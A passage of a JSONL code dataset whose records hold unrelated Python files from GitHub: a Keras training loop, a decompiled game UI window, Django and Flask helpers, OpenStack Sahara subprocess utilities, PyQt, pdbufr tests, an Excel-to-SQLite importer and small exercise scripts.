'../../../datasets/Positionwise/midfielders.csv',\n '../../../datasets/Positionwise/strikers.csv', '../../../datasets/Positionwise/wingers.csv']\n\nfor i in tqdm(range(len(PATH_LIST)), desc = \"Training Model\", ncols = 100):\n\n #Reading PATH\n dataset = pd.read_csv(PATH)\n\n #Cleaning Dataset\n dataset.isna().sum()\n dataset = dataset.dropna()\n\n #Getting all attributes\n attributeList = list(dataset.columns)[14:]\n\n #Filtering dataframe\n dataset = dataset[attributeList+['overall']]\n\n #Obtaining model's input and output\n X = np.array(dataset[attributeList])\n y = np.array(dataset[['overall']])\n\n X = scaler.fit_transform(X)\n\n #Splitting into test and train\n X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2)\n\n #Obtaining model\n model = getModel(len(X[0]))\n\n #Compiling model\n model.compile(Adam(),loss = 'mse' )\n\n #Training model\n history = model.fit(X_train,y_train,batch_size = 20,shuffle=True,verbose=0,epochs = 5000, callbacks=callbacks)\n\n #Saving weights\n model.save_weights(f\"./weights/{PATH[28:-4]}.h5\")\n\n # #Evaluating model\n print(\"Evaluate on test data\")\n results = model.evaluate(X_test, y_test, batch_size=20)\n print(\"test loss, test acc:\", results)\n\n fileName = f\"./output/{PATH[28:-4]}.txt\"\n with open(fileName, 'w') as file:\n modelOutput = model.predict(X_test)\n for i in range(len(y_test)):\n file.write(f\"Expected Output: {y_test[i][0]}\\tModel's Output: {modelOutput[i][0]}\\n\")\n #model.predict([[88, 95, 70, 92, 88]])\n #X_test[-1]\n #y_test[-1]\n\n","repo_name":"LaRuim/SDS-Project","sub_path":"scripts/hypothesis/ml_model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1158895897","text":"# 2015.11.18 11:53:29 Støední Evropa (bìžný èas)\n# Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/boosters/BoostersWindow.py\nfrom collections import defaultdict\nfrom operator import attrgetter\nimport constants\nfrom adisp import process\nfrom helpers.i18n import makeString as _ms\nfrom gui import SystemMessages\nfrom gui import DialogsInterface\nfrom gui.ClientUpdateManager import g_clientUpdateManager\nfrom gui.Scaleform.daapi.view.lobby.boosters.BoostersPanelComponent import ADD_BOOSTER_ID\nfrom gui.Scaleform.daapi.view.meta.BoostersWindowMeta import BoostersWindowMeta\nfrom gui.goodies.Booster import MAX_ACTIVE_BOOSTERS_COUNT\nfrom gui.goodies.GoodiesCache import g_goodiesCache\nfrom gui.server_events import g_eventsCache, events_dispatcher as quests_events\nfrom gui.shared.formatters import text_styles\nfrom gui.Scaleform.locale.MENU import MENU\nfrom gui.Scaleform.locale.TOOLTIPS import TOOLTIPS\nfrom gui.shared.gui_items.processors.goodies import BoosterActivator\nfrom gui.shared.utils import decorators\nfrom gui.shared.utils.requesters.ItemsRequester import REQ_CRITERIA\nfrom gui.shared.utils.functions import makeTooltip\nfrom gui.Scaleform.genConsts.BOOSTER_CONSTANTS import BOOSTER_CONSTANTS\nfrom gui.Scaleform.locale.RES_ICONS import RES_ICONS\nfrom gui.Scaleform.daapi.view.dialogs import I18nConfirmDialogMeta\nfrom gui.Scaleform.daapi.view.dialogs import DIALOG_BUTTON_ID\n\nclass BoostersWindow(BoostersWindowMeta):\n\n def __init__(self, ctx = None):\n super(BoostersWindow, self).__init__()\n self._availableBoosters = None\n self._boosterQuests = None\n self._activeBoosters = None\n self._isReceivedBoostersTab = ctx.get('slotID', None) != ADD_BOOSTER_ID\n self._boostersInQuestCount = 0\n return\n\n def onWindowClose(self):\n self.destroy()\n\n def requestBoostersArray(self, isReceivedBoostersTab):\n self._isReceivedBoostersTab = isReceivedBoostersTab\n self.as_setListDataS(self.__getBoostersVOs(self._isReceivedBoostersTab), False)\n self.__setCommonData()\n\n @process\n def onBoosterActionBtnClick(self, boosterID, questID):\n if self._isReceivedBoostersTab:\n booster = g_goodiesCache.getBooster(boosterID)\n activeBooster = self.__getActiveBoosterByType(booster.boosterType)\n if activeBooster is not None:\n canActivate = yield DialogsInterface.showDialog(I18nConfirmDialogMeta(BOOSTER_CONSTANTS.BOOSTER_ACTIVATION_CONFORMATION_TEXT_KEY, messageCtx={'newBoosterName': text_styles.middleTitle(booster.description),\n 'curBoosterName': text_styles.middleTitle(activeBooster.description)}, focusedID=DIALOG_BUTTON_ID.CLOSE))\n else:\n canActivate = True\n if canActivate:\n self.__activateBoosterRequest(booster)\n else:\n quests_events.showEventsWindow(questID, constants.EVENT_TYPE.BATTLE_QUEST)\n return\n\n def _populate(self):\n super(BoostersWindow, self)._populate()\n g_clientUpdateManager.addCallbacks({'goodies': self.__onUpdateGoodies})\n g_eventsCache.onSyncCompleted += self.__onUpdateGoodies\n self._availableBoosters = self.__getAvailableBoosters()\n self._boosterQuests = self.__getBoosterQuests()\n self._activeBoosters = self.__getActiveBoosters()\n self._boostersInQuestCount = self.__getBoostersCountInQuests()\n self.as_setListDataS(self.__getBoostersVOs(self._isReceivedBoostersTab), True)\n self.__setCommonData()\n self.__setStaticData()\n\n def _dispose(self):\n g_clientUpdateManager.removeObjectCallbacks(self)\n g_eventsCache.onSyncCompleted -= self.__onUpdateGoodies\n self._availableBoosters = None\n self._boosterQuests = None\n self._activeBoosters = None\n self._isReceivedBoostersTab = None\n super(BoostersWindow, self)._dispose()\n return\n\n def __onUpdateGoodies(self, *args):\n self._activeBoosters = self.__getActiveBoosters()\n self._availableBoosters = self.__getAvailableBoosters()\n self._boosterQuests = self.__getBoosterQuests()\n self._boostersInQuestCount = self.__getBoostersCountInQuests()\n self.__setCommonData()\n self.as_setListDataS(self.__getBoostersVOs(self._isReceivedBoostersTab), False)\n\n def __setStaticData(self):\n self.as_setStaticDataS({'noInfoText': text_styles.standard(MENU.BOOSTERSWINDOW_BOOSTERSTABLE_NOINFO),\n 'windowTitle': _ms(MENU.BOOSTERSWINDOW_TITLE),\n 'closeBtnLabel': _ms(MENU.BOOSTERSWINDOW_CLOSEBTN_LABEL),\n 'noInfoBgSource': RES_ICONS.MAPS_ICONS_BOOSTERS_NOINFOBG})\n\n def __setCommonData(self):\n isHaveNotInfo = not self._boostersInQuestCount\n if self._isReceivedBoostersTab:\n isHaveNotInfo = not len(self._availableBoosters)\n self.as_setDataS({'isHaveNotInfo': isHaveNotInfo,\n 'availableTabLabel': self.__getAvailableTabLabel(),\n 'notAvailableTabLabel': self.__getNotAvailableTabLabel(),\n 'activeText': self.__getActiveText(),\n 'isReceivedBoostersTab': self._isReceivedBoostersTab})\n\n def __getBoostersCountInQuests(self):\n boostersCount = 0\n questsBoosters = self._boosterQuests.values()\n for boosters in questsBoosters:\n for _, count in boosters:\n boostersCount += count\n\n return boostersCount\n\n def __getAvailableTabLabel(self):\n boostersCount = sum((booster.count for booster in self._availableBoosters))\n return _ms(MENU.BOOSTERSWINDOW_TABS_AVAILABLELABEL, availableNo=boostersCount)\n\n def __getNotAvailableTabLabel(self):\n return _ms(MENU.BOOSTERSWINDOW_TABS_NOTAVAILABLELABEL, notAvailableNo=self._boostersInQuestCount)\n\n def __getActiveText(self):\n return text_styles.highTitle(_ms(MENU.BOOSTERSWINDOW_ACTIVEBOOSTERS, activeNo=len(self._activeBoosters), allNo=MAX_ACTIVE_BOOSTERS_COUNT))\n\n def __getBoostersVOs(self, isReceivedBoostersTab):\n boosterVOs = []\n if isReceivedBoostersTab:\n for booster in self._availableBoosters:\n boosterVOs.append(self.__makeBoosterVO(booster, booster.isReadyToActivate))\n\n else:\n for (questID, qUserName), boosters in self._boosterQuests.iteritems():\n for booster, count in boosters:\n boosterVOs.append(self.__makeBoosterVO(booster, questID is not None, questID, qUserName, count))\n\n return boosterVOs\n\n def __getBoosterFullName(self, booster):\n return text_styles.middleTitle(_ms(MENU.BOOSTERSWINDOW_BOOSTERSTABLERENDERER_HEADER, boosterName=booster.userName, quality=booster.qualityStr))\n\n def __makeBoosterVO(self, booster, isBtnEnabled, questID = None, qUserName = None, qBoosterCount = None):\n activateBtnLabel = MENU.BOOSTERSWINDOW_BOOSTERSTABLERENDERER_ACTIVATEBTNLABEL if questID is None else MENU.BOOSTERSWINDOW_BOOSTERSTABLERENDERER_GOTOQUESTBTNLABEL\n return {'id': booster.boosterID,\n 'questID': questID,\n 'actionBtnEnabled': isBtnEnabled,\n 'actionBtnTooltip': self.__getQuestTooltip(qUserName, isBtnEnabled),\n 'headerText': self.__getBoosterFullName(booster),\n 'descriptionText': text_styles.main(booster.description),\n 'addDescriptionText': self.__getAdditionalDescription(booster, qUserName),\n 'actionBtnLabel': _ms(activateBtnLabel),\n 'boosterSlotVO': self.__makeBoosterSlotVO(booster, qBoosterCount)}\n\n def __makeBoosterSlotVO(self, booster, qBoosterCount):\n boosterCount = qBoosterCount or booster.count\n return {'icon': booster.icon,\n 'countText': text_styles.counter(str(boosterCount)),\n 'showCount': boosterCount > 1,\n 'qualityIconSrc': booster.getQualityIcon(),\n 'slotLinkage': BOOSTER_CONSTANTS.SLOT_UI,\n 'showLeftTime': False}\n\n def __getQuestTooltip(self, qUserName, isBtnEnabled):\n if qUserName is not None:\n return makeTooltip(None, _ms(TOOLTIPS.BOOSTER_QUESTLINKBTN_BODY, questName=qUserName))\n elif not isBtnEnabled:\n return makeTooltip(None, _ms(TOOLTIPS.BOOSTER_ACTIVEBTN_DISABLED_BODY))\n else:\n return ''\n\n def __getAdditionalDescription(self, booster, qUserName):\n if qUserName is not None:\n text = _ms(MENU.BOOSTERSWINDOW_BOOSTERSTABLERENDERER_QUESTFOROPEN, questName=qUserName)\n elif booster.expiryTime:\n text = _ms(MENU.BOOSTERSWINDOW_BOOSTERSTABLERENDERER_TIME, tillTime=booster.getExpiryDate())\n else:\n text = _ms(MENU.BOOSTERSWINDOW_BOOSTERSTABLERENDERER_UNDEFINETIME)\n return text_styles.standard(text)\n\n def __getAvailableBoosters(self):\n criteria = REQ_CRITERIA.BOOSTER.IN_ACCOUNT\n return g_goodiesCache.getBoosters(criteria=criteria).values()\n\n def __getActiveBoosters(self):\n return g_goodiesCache.getBoosters(criteria=REQ_CRITERIA.BOOSTER.ACTIVE).values()\n\n def __getActiveBoosterByType(self, bType):\n criteria = REQ_CRITERIA.BOOSTER.ACTIVE | REQ_CRITERIA.BOOSTER.BOOSTER_TYPES([bType])\n activeBoosters = g_goodiesCache.getBoosters(criteria=criteria).values()\n if len(activeBoosters) > 0:\n return max(activeBoosters, key=attrgetter('effectValue'))\n else:\n return None\n\n def __getBoosterQuests(self):\n result = defaultdict(list)\n quests = g_eventsCache.getQuests(lambda q: q.isAvailable()[0] and not q.isCompleted())\n for q in quests.itervalues():\n bonuses = q.getBonuses('goodies')\n for b in bonuses:\n boosters = b.getBoosters()\n for booster, count in boosters.iteritems():\n result[q.getID(), q.getUserName()].append((booster, count))\n\n return result\n\n @decorators.process('loadStats')\n def __activateBoosterRequest(self, booster):\n result = yield BoosterActivator(booster).request()\n if len(result.userMsg):\n SystemMessages.g_instance.pushI18nMessage(result.userMsg, type=result.sysMsgType)\n# okay decompyling c:\\Users\\PC\\wotsources\\files\\originals\\res\\scripts\\client\\gui\\scaleform\\daapi\\view\\lobby\\boosters\\boosterswindow.pyc \n# decompiled 1 files: 1 okay, 0 failed, 0 verify failed\n# 2015.11.18 11:53:29 Støední Evropa (bìžný èas)\n","repo_name":"webiumsk/WOT-0.9.12","sub_path":"res/scripts/client/gui/scaleform/daapi/view/lobby/boosters/boosterswindow.py","file_name":"boosterswindow.py","file_ext":"py","file_size_in_byte":10373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"11199651831","text":"from schedule.models import ScheduleTable\n\ndef getUnloadSid(iid):\n sTable = ScheduleTable.objects.filter(iid_id = iid)\n sList = []\n tList = []\n \n for st in sTable:\n sList.extend(st.slist)\n tList.extend(st.tflag)\n\n indexOfTload = [] \n \n for idx, t in enumerate(tList):\n if t == 1:\n indexOfTload.append(idx)\n\n unloadSid = []\n\n for i in indexOfTload:\n unloadSid.append(sList[i])\n\n return unloadSid\n\ndef getTflag(sidlist, unloadSidList): \n\n temp_tflag = [0] * len(sidlist) \n\n for idx,sid in enumerate(sidlist):\n for unloadSid in unloadSidList:\n if unloadSid == int(sid):\n temp_tflag[idx] = 1\n \n return temp_tflag\n","repo_name":"alswo/django_project","sub_path":"schedule/maintainTodayLoad.py","file_name":"maintainTodayLoad.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15242353234","text":"from bitmovin.resources import AbstractCustomDataResource\n\n\nclass CustomData(AbstractCustomDataResource):\n\n def __init__(self, created_at, modified_at, custom_data):\n super().__init__(custom_data=custom_data)\n self.createdAt = created_at\n self.modifiedAt = modified_at\n\n @classmethod\n def parse_from_json_object(cls, json_object):\n created_at = json_object.get('createdAt')\n modified_at = json_object.get('modifiedAt')\n data = json_object.get('customData')\n custom_data = CustomData(created_at=created_at, modified_at=modified_at, custom_data=data)\n return custom_data\n","repo_name":"bitmovin/bitmovin-python","sub_path":"bitmovin/resources/models/custom_data.py","file_name":"custom_data.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"40"} +{"seq_id":"7211390669","text":"'''\nMaior e Posição\n'''\n\nnumbers = []\n\nmaior = 0\nposicao = 0\n\nfor i, index in enumerate(range(1, 101)):\n x = int(input())\n numbers.append(x)\n\n if x > maior:\n maior = x\n posicao = index\n\nprint(maior)\nprint(posicao)","repo_name":"demmorou/uri-answers","sub_path":"1080.py","file_name":"1080.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18168139875","text":"valores = []\r\nposmaior = 0\r\nposmenor = 0\r\nfor c in range(0, 5):\r\n valores.append(int(input(f'valor na posição {c + 1}: ')))\r\n if c == 0:\r\n maior = menor = valores[c]\r\n if valores[c] > maior:\r\n maior = valores[c]\r\n if valores[c] < menor:\r\n menor = valores[c]\r\nfor cont in range(0, 5):\r\n print(f'{valores[cont]} ', end='')\r\nprint()\r\nfor i, v in enumerate(valores):\r\n if v == maior:\r\n posmaior = i\r\nfor i, v in enumerate(valores):\r\n if v == menor:\r\n posmenor = i\r\nprint(f'O maior foi número foi {maior} e foi encontrado na posição {posmaior}')\r\nprint(f'O menor foi número foi {menor} e foi encontrado na posição {posmenor}')\r\n\r\n","repo_name":"Rodrigocalaca/pythonExercicios3","sub_path":"ex078.py","file_name":"ex078.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"pt","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"12882973223","text":"def sort_with_custom_orders(values, key=lambda x: x, prefix_orders=None, suffix_orders=None):\n from collections import defaultdict\n\n if not prefix_orders:\n prefix_orders = []\n prefix_orders = list(prefix_orders)\n prefix_orders_set = set(prefix_orders)\n\n if len(prefix_orders) != len(prefix_orders_set):\n raise ValueError('prefix_order contains duplicated values')\n\n if not suffix_orders:\n suffix_orders = []\n suffix_orders = list(suffix_orders)\n suffix_orders_set = set(suffix_orders)\n\n if len(suffix_orders) != len(suffix_orders_set):\n raise ValueError('suffix_orders contains duplicated values')\n\n if prefix_orders_set.intersection(suffix_orders_set):\n # have some values in both prefix and suffix\n raise ValueError('prefix and suffix contains same value')\n\n order_map = defaultdict(lambda: 1)\n for idx, item in enumerate(prefix_orders):\n order_map[item] = idx - len(prefix_orders)\n\n for idx, item in enumerate(suffix_orders, start=2):\n order_map[item] = idx\n\n sorted_values = sorted(values, key=lambda x: (order_map[key(x)], key(x)))\n\n return sorted_values\n\n\nif __name__ == '__main__':\n values = ['h2', 'h1', 't2', 't1', 'B', 'a', 'Y', 'x']\n\n assert sorted(values) == ['B', 'Y', 'a', 'h1', 'h2', 't1', 't2', 'x']\n assert sorted(values, key=str.lower) == ['a', 'B', 'h1', 'h2', 't1', 't2', 'x', 'Y']\n\n # h (h1, h2) stands for headers, t (t1, t2) stands for tails\n sorted_values = sort_with_custom_orders(values, key=str.lower,\n prefix_orders=['h1', 'h2', 'h3'],\n suffix_orders=['t1', 't2', 't3'])\n\n assert sorted_values == ['h1', 'h2', 'a', 'B', 'x', 'Y', 't1', 't2']\n \n class Person:\n def __init__(self, name):\n self.name = name\n\n\n def __eq__(self, other):\n if not isinstance(other, Person):\n return False\n return self.name == other.name\n \n def __hash__(self):\n return hash(self.name)\n\n\n res = sort_with_custom_orders([Person('lml'), Person('xc'), Person('wyw')], key=lambda p: p.name, prefix_orders=['xc', 'lml'])\n assert res == [Person('xc'), Person('lml'), Person('wyw')]\n\n \n","repo_name":"albertmenglongli/ToolsLibrary","sub_path":"code_snippets/lists/custom_sort.py","file_name":"custom_sort.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"40"} +{"seq_id":"42875795342","text":"import numpy as np\nimport pandas as pd\nfrom flask import Flask\nfrom flask import jsonify\nfrom datetime import datetime\nfrom werkzeug.routing import BaseConverter, ValidationError\nimport logging\nimport nasdaqpredictor\nfrom nasdaqpredictor.model import Model\nfrom nasdaqpredictor.dataloader import DataTransformer, DataLoader\n\nLOGGER = logging.getLogger(__name__)\napp = Flask(__name__)\n\nloader = DataLoader('/nasdaq_tickers.csv',\n datetime(2000, 1, 1),\n datetime(2017, 1, 1))\ntransformer = DataTransformer(loader, return_shift_days=-2)\nmodel = Model(transformer,\n dev_date=datetime(2015, 1, 1),\n file_path='models/full_model_2017_11_22_11_07.hdf5')\n\n\nclass DateConverter(BaseConverter):\n regex = r'\\d{4}-\\d{2}-\\d{2}'\n\n def to_python(self, value):\n try:\n return datetime.strptime(value, '%Y-%m-%d').date()\n except ValueError:\n raise ValidationError()\n\n def to_url(self, value):\n return value.strftime('%Y-%m-%d')\n\n\napp.url_map.converters['date'] = DateConverter\n\n\n@app.route('/predict/<ticker>/<date:selected_date>', methods=['GET', 'POST'])\ndef predict(ticker, selected_date):\n log_msg = 'Predict {}, {}'.format(ticker, selected_date)\n LOGGER.info(log_msg)\n predicted = model.predict_one(ticker, selected_date)\n return jsonify(long_prediction=np.asscalar(predicted[0][0]),\n short_prediction=np.asscalar(predicted[0][1]))\n\n\n@app.route('/predict-range/<ticker>/<date:from_date>/<date:to_date>', methods=['GET', 'POST'])\ndef predict_range(ticker, from_date, to_date):\n log_msg = 'Predict {}, {} - {}'.format(ticker, from_date, to_date)\n LOGGER.info(log_msg)\n daterange = pd.date_range(from_date, to_date)\n dates_predictions = {}\n for single_date in daterange:\n try:\n predicted = model.predict_one(ticker, single_date)\n dates_predictions[single_date.strftime('%Y-%m-%d')] = predicted[0].tolist()\n except Exception as e:\n LOGGER.error(e)\n return jsonify(dates_predictions)\n\n\nif __name__ == '__main__':\n model.build_model_data()\n model.build_neural_net()\n app.run(port=80, host='0.0.0.0')\n","repo_name":"minimalgeek/DeepLearning","sub_path":"Stock/nasdaqpredictor/nasdaqpredictor/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"8546507460","text":"import logging\nimport os\nimport pickle\nimport sys\n\nfrom eventlet.green import subprocess\nfrom eventlet import timeout as e_timeout\n\nfrom sahara import context\n\n\nLOG = logging.getLogger(__name__)\n\n\ndef _get_sub_executable():\n return '%s/_sahara-subprocess' % os.path.dirname(sys.argv[0])\n\n\ndef start_subprocess():\n return subprocess.Popen((sys.executable, _get_sub_executable()),\n close_fds=True,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n\ndef run_in_subprocess(proc, func, args=(), kwargs={}):\n try:\n pickle.dump(func, proc.stdin)\n pickle.dump(args, proc.stdin)\n pickle.dump(kwargs, proc.stdin)\n proc.stdin.flush()\n\n result = pickle.load(proc.stdout)\n\n if 'exception' in result:\n raise SubprocessException(result['exception'])\n\n return result['output']\n finally:\n # NOTE(dmitryme): in openstack/common/processutils.py it\n # is suggested to sleep a little between calls to multiprocessing.\n # That should allow it make some necessary cleanup\n context.sleep(0)\n\n\ndef _finish(cleanup_func):\n cleanup_func()\n sys.stdin.close()\n sys.stdout.close()\n sys.stderr.close()\n sys.exit(0)\n\n\ndef shutdown_subprocess(proc, cleanup_func):\n try:\n with e_timeout.Timeout(5):\n # timeout would mean that our single-threaded subprocess\n # is hung on previous task which blocks _finish to complete\n run_in_subprocess(proc, _finish, (cleanup_func,))\n except BaseException:\n # exception could be caused by either timeout, or\n # successful shutdown, ignoring anyway\n pass\n finally:\n kill_subprocess(proc)\n\n\ndef kill_subprocess(proc):\n proc.stdin.close()\n proc.stdout.close()\n proc.stderr.close()\n\n try:\n proc.kill()\n except OSError:\n # could be caused by process already dead, so ignoring\n pass\n\n\nclass SubprocessException(Exception):\n def __init__(self, e):\n super(SubprocessException, self).__init__(e)\n","repo_name":"mapr/sahara","sub_path":"sahara/utils/procutils.py","file_name":"procutils.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34820033422","text":"def multi_values(*args):\n print(args)\n return args\ntuple1 = multi_values(1,1,2,3,4)\nprint(tuple1)\nlist_date = [1,2,32,3,6]\nmulti_values(*list_date)\n\ndef multi_value(**kwargs):\n print(kwargs)\n return kwargs\ndict = {'性别':'男'}\nmulti_value(**dict)\n\nresult = lambda x : x*2\nprint(result(8))\na = 1\nb = 2\nresult2 = 'a大于b' if a > b else 'a小于b'\nprint(result2)\nexam_result = {'张无忌':88,'赵敏':77,'蝙蝠侠':99,'超人':10000,'无名':55,'小明':38}\nexam_result2 = sorted(exam_result.items(),key = lambda d : d[1],reverse = False)\nprint(exam_result2,type(exam_result2))\ndict = {}\nfor i in exam_result2:\n dict[i[0]] = i[1]\nprint(dict,type(dict))\n\n\n\n","repo_name":"wangyandong1/test_demo","sub_path":"function_date.py","file_name":"function_date.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14985579290","text":"import sys\nfrom PyQt4 import QtGui, QtCore\n\nclass Window(QtGui.QMainWindow):\n def __init__(self):\n super(Window, self).__init__()\n self.setGeometry(50, 50, 600, 300)\n self.setWindowTitle(\"Second lecture practice\")\n self.setWindowIcon(QtGui.QIcon('logo.png'))\n self.home()\n\n def home(self):\n btn = QtGui.QPushButton(\"Quit\", self)\n btn.clicked.connect(self.close_application)\n btn.resize(btn.minimumSizeHint())\n btn.move(100, 100)\n\n self.show()\n\n def close_application(self):\n print(\"Hello World!\")\n self.setWindowTitle(\"Seriously!\")\n\n # sys.exit()\n\ndef run():\n app = QtGui.QApplication(sys.argv)\n GUI = Window()\n sys.exit(app.exec_())\n\nrun()","repo_name":"Sanzidikawsar/PyQt-practice-with-sentdex","sub_path":"lec-4.py","file_name":"lec-4.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18026231610","text":"import typing as T\n\nimport numpy as np\nimport pytest\n\npd = pytest.importorskip(\"pandas\")\n\nfrom pdbufr import read_bufr\n\nassert_frame_equal = pd.testing.assert_frame_equal\n\n\ndef build_message_list() -> T.Any:\n messages = [\n {\n \"edition\": 3,\n \"masterTableNumber\": 0,\n \"numberOfSubsets\": 1,\n \"unexpandedDescriptors\": 0,\n \"blockNumber\": 1,\n \"stationNumber\": 128,\n \"airTemperature\": 289.7,\n \"dewpointTemperature\": 285.16,\n },\n {\n \"edition\": 4,\n \"masterTableNumber\": 1,\n \"numberOfSubsets\": 1,\n \"unexpandedDescriptors\": 1,\n \"stationNumber\": 129,\n \"airTemperature\": 249.1,\n \"dewpointTemperature\": 140.12,\n },\n ]\n\n class _Msg:\n def __init__(self, d: T.Any) -> None:\n self.d = d\n self.codes = {\n \"blockNumber\": 1001,\n \"stationNumber\": 1002,\n \"airTemperature\": 12001,\n \"dewpointTemperature\": 12003,\n }\n\n def __enter__(self) -> T.Any:\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb) -> None: # type: ignore\n pass\n\n def __iter__(self) -> T.Any:\n return iter(self.d)\n\n def __getitem__(self, key: str) -> T.Any:\n return self.d[key]\n\n def __setitem__(self, key: str, value: T.Any) -> None:\n self.d[key] = value\n\n def is_coord(self, key: str) -> bool:\n code = self.codes.get(key, None)\n return code is not None and code < 9999\n\n class _MsgList:\n def __init__(self, d: T.Any) -> None:\n self.d = d\n\n def __iter__(self) -> T.Any:\n return iter(self.d)\n\n lst = _MsgList([_Msg(messages[0]), _Msg(messages[1])])\n return lst\n\n\ndef test_message_list_1() -> None:\n lst = build_message_list()\n res = read_bufr(lst, columns=(\"airTemperature\"))\n\n ref = {\"airTemperature\": np.array([289.7, 249.1])}\n ref = pd.DataFrame.from_dict(ref)\n\n assert_frame_equal(res, ref)\n\n\ndef test_message_list_2() -> None:\n lst = build_message_list()\n res = read_bufr(lst, columns=(\"airTemperature\"), filters={\"stationNumber\": 129})\n\n ref = {\"airTemperature\": np.array([249.1])}\n ref = pd.DataFrame.from_dict(ref)\n\n assert_frame_equal(res, ref)\n","repo_name":"ecmwf/pdbufr","sub_path":"tests/test_70_message_list.py","file_name":"test_70_message_list.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"40"} +{"seq_id":"30862994934","text":"from openpyxl import Workbook\nfrom openpyxl import load_workbook\nimport sys\nimport chardet\nimport sqlite3\n\n#导入Excel文件\ndest_filename = '选题名单.xlsx'\nexcel = load_workbook(dest_filename)\nexcel_wb = excel.active\n\n#获取最大行数\nprint (\"Max_row\",excel_wb.max_row)\nMaxiumRow = excel_wb.max_row+1\ncount_mianshi =0;\ncount_kaiti = 0;\ncount_cansai = 0;\n\n#连接到数据库\ndbconn = sqlite3.connect(\"stu.db\")\n\n#创建一个游标\ncursor = dbconn.cursor()\n\n#创建stuinfo 表\n#sql = \"\"\n#cursor.execute(sql)\n\nselect = \"select * from stuinfo limit 1 offset (select count(*) - 1 from stuinfo)\"\n #\"select * from stuinfo order by 'index' desc limit 0,1\"\ncursor.execute(select)\nvalues = cursor.fetchone()\n#print(values)\nMaxiumIndex = str(int(values[0]) + 1)\n#print (MaxiumIndex)\n\n\n#按行遍历excel文件\nfor row in range(2,MaxiumRow):\n #print(excel_wb.cell(row=row,column=1).value)\n #读取ID\n stu_no=excel_wb.cell(row=row,column=1).value\n #print(\"ID\",stu_no)\n #读取Name\n stu_name=excel_wb.cell(row=row,column=2).value\n #读取class\n stu_class=excel_wb.cell(row=row,column=5).value\n\n #读取 Status 和 Title, 注意可能为空\n detial_info=excel_wb.cell(row=row,column=9).value\n\n if not(detial_info is None) :\n #detial_info.replace(\",\",\",\")\n #detial_info.replace(\".\",\",\")\n #detial_info.replace(\" \",\"\")\n\n #分割信息,得到 status 和 title\n if detial_info.count(\",\") == 1:\n stu_type = detial_info.split(\",\", 2)[0]\n title= detial_info.split(\",\",2)[1]\n elif detial_info.count(\",\") == 2:\n stu_type = detial_info.split(\",\", 3)[0]\n title = detial_info.split(\",\", 3)[1] + \":\" + detial_info.split(\",\", 3)[2]\n else:\n print (\"ID:\",stu_no,\"信息错误\")\n stu_type = \"Error\"\n title=\"Error\"\n #print(stu_type,title)\n\n selectbyid = \"select * from stuinfo where id = ?\"\n # select = \"select * from stuinfo\"\n # cursor.execute(select)\n cursor.execute(selectbyid,(stu_no,))\n value = cursor.fetchone()\n #print(value)\n\n if (value is None):\n #如果没有,则新增加一条记录\n sqlinsert = \"INSERT INTO stuinfo('index',id,name,class,status,title) VALUES (?,?,?,?,?,?)\"\n data = (MaxiumIndex,stu_no,stu_name,stu_class,stu_type,title)\n print(\"Insert ID\",stu_no,\"to Index:\",MaxiumIndex)\n MaxiumIndex = str(int(MaxiumIndex) + 1)\n\n #print(sqlinsert)\n #print(MaxiumIndex)\n #print(data)\n cursor.execute(sqlinsert, data)\n else:\n #如果存在,则修改原来记录\n #print(value)\n sqlupdate = \"update stuinfo set status=?, title=? where id =?\"\n cursor.execute(sqlupdate, (stu_type,title,stu_no))\n print(\"Update ID\",stu_no,\"at Index:\",value[0])\n #print(sqlupdate)\n dbconn.commit()\n\ndbconn.commit()\ndbconn.close()","repo_name":"bd9bkc/Excel2Sqlite","sub_path":"Excel2Sqlite.py","file_name":"Excel2Sqlite.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27801368816","text":"\"\"\"\nEric Nordstrom\nPython 3.6.0\n2/5/2018\n\nGet metrics on each sentence of a corpus individually.\n\"\"\"\n\n\nfrom copy import copy\nimport logging\nSTARTS = -1 # markers on first token of sentence\nENDS = 0 # markers on last token of sentence\nmarker_type = ENDS # adjust this according to data\n\n# logging setup\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s:%(levelname)s:%(message)s')\nlogging.LBL = 5 # line-by-line: more verbose than DEBUG as it logs on every line of data\nlogging.addLevelName(logging.LBL, 'LBL')\nlogging.lbl = lambda msg, *args, **kwargs: logging.log(logging.LBL, msg, *args, **kwargs)\n\n\ndef metrics(funcs, args, markers):\n '''\\\ngenerator of generators for the result of each function on each sentence\n`args`: lang & POS values for each token\n`markers`: indices indicating sentence marker locations\\\n '''\n\n # debugging\n try:\n LA = len(args)\n except TypeError:\n LA = 'N/A'\n try:\n LM = len(markers)\n except 